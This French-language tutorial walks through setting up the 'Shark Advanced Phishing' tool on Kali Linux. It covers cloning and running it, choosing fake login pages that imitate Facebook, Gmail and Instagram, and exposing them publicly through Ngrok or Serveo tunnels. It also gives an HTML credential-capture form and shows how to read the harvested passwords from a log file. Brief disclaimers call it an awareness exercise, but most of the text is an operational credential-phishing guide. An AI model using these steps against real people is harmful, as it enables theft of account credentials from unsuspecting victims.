Utilisation de Shark Advanced Phishing sous Kali Linux 🐉
Shark Advanced Phishing est un outil puissant pour simuler des campagnes de phishing avancées. Ce tutoriel complet couvre l’installation, la création de campagnes, l’analyse des données, et les meilleures pratiques de sensibilisation à la cybersécurité. Utilisez cet outil uniquement dans un cadre éthique et légal. ⚠️
1️⃣ Installation de Shark Advanced Phishing
Pré-requis :
- Kali Linux à jour
- Python 3.x installé
- Git pour cloner les projets
- Ngrok (ou Serveo) pour le tunneling
- Connexion internet active
Étapes d’installation détaillées :
- Mettre à jour le système :
sudo apt update && sudo apt upgrade -y - Cloner le dépôt GitHub officiel :
git clone https://github.com/advanced-phishing/shark.git cd shark - Installer les dépendances Python :
sudo apt install python3 python3-pip -y pip3 install -r requirements.txt - Tester le bon fonctionnement :
python3 shark.pyL’interface principale devrait s’afficher.
2️⃣ Présentation de l’Interface de Shark
Une fois Shark lancé, vous accédez à un menu interactif permettant :
- Choix de modèles de phishing prédéfinis : Facebook, Gmail, Instagram, etc.
- Personnalisation des modèles HTML.
- Configuration du serveur local.
- Tunneling via Ngrok ou Serveo.
- Logs automatiques pour capturer les données saisies.
3️⃣ Création d’une Campagne de Phishing
Étape 1 : Sélection du modèle
Depuis le menu principal :
- Choisissez un modèle prédéfini, par exemple : Facebook.
- Configurez l’URL de redirection (par exemple :
https://facebook.com). - Définissez le fichier log pour stocker les informations capturées.
Étape 2 : Démarrage du serveur local
Lancez le serveur intégré :
python3 shark.py
Une URL locale sera générée, par exemple : http://127.0.0.1:8080.
4️⃣ Exposer le Serveur au Monde avec Tunneling
Option 1 : Utiliser Ngrok
- Installer Ngrok :
sudo apt install ngrok -y - Exposer le serveur local :
ngrok http 8080Ngrok génère une URL publique (par exemple :
https://abcd1234.ngrok.io).
Option 2 : Utiliser Serveo
Lancez Serveo avec la commande suivante :
ssh -R 80:localhost:8080 serveo.net
Une URL publique Serveo sera fournie (par exemple : https://serveo.net).
5️⃣ Personnalisation des Campagnes
Modifier un modèle HTML
Créez ou personnalisez une page de phishing avec un éditeur HTML. Exemple de formulaire :
Le code en lui même.
<form action="capture.php" method="POST">
<label for="username">Nom d'utilisateur :</label>
<input type="text" id="username" name="username" required>
<br>
<label for="password">Mot de passe :</label>
<input type="password" id="password" name="password" required>
<br>
<button type="submit">Connexion</button>
</form>
Ajoutez ce fichier au répertoire Shark et configurez-le dans le script.
6️⃣ Analyse des Données Collectées
Accéder aux logs
Les identifiants capturés sont enregistrés dans un fichier log. Commande pour les consulter :
cat logs.txt
Exploitation des résultats
Ces données peuvent être utilisées pour sensibiliser aux risques de phishing et démontrer les vulnérabilités.
7️⃣ Fonctionnalités Avancées
- Captures dynamiques (live logging) pour voir les saisies en temps réel.
- Création de tunnels multiples pour gérer plusieurs campagnes.
8️⃣ Meilleures Pratiques pour la Sensibilisation
- Reconnaitre un phishing : Vérifiez toujours l’URL, évitez les pages non sécurisées.
- Sensibilisation par la pratique : Testez vos équipes dans un cadre contrôlé.
9️⃣ Limites et Cadre Légal
⚠️ Avertissement : Shark ne doit être utilisé que dans un cadre légal et avec consentement. Toute utilisation non autorisée est illégale.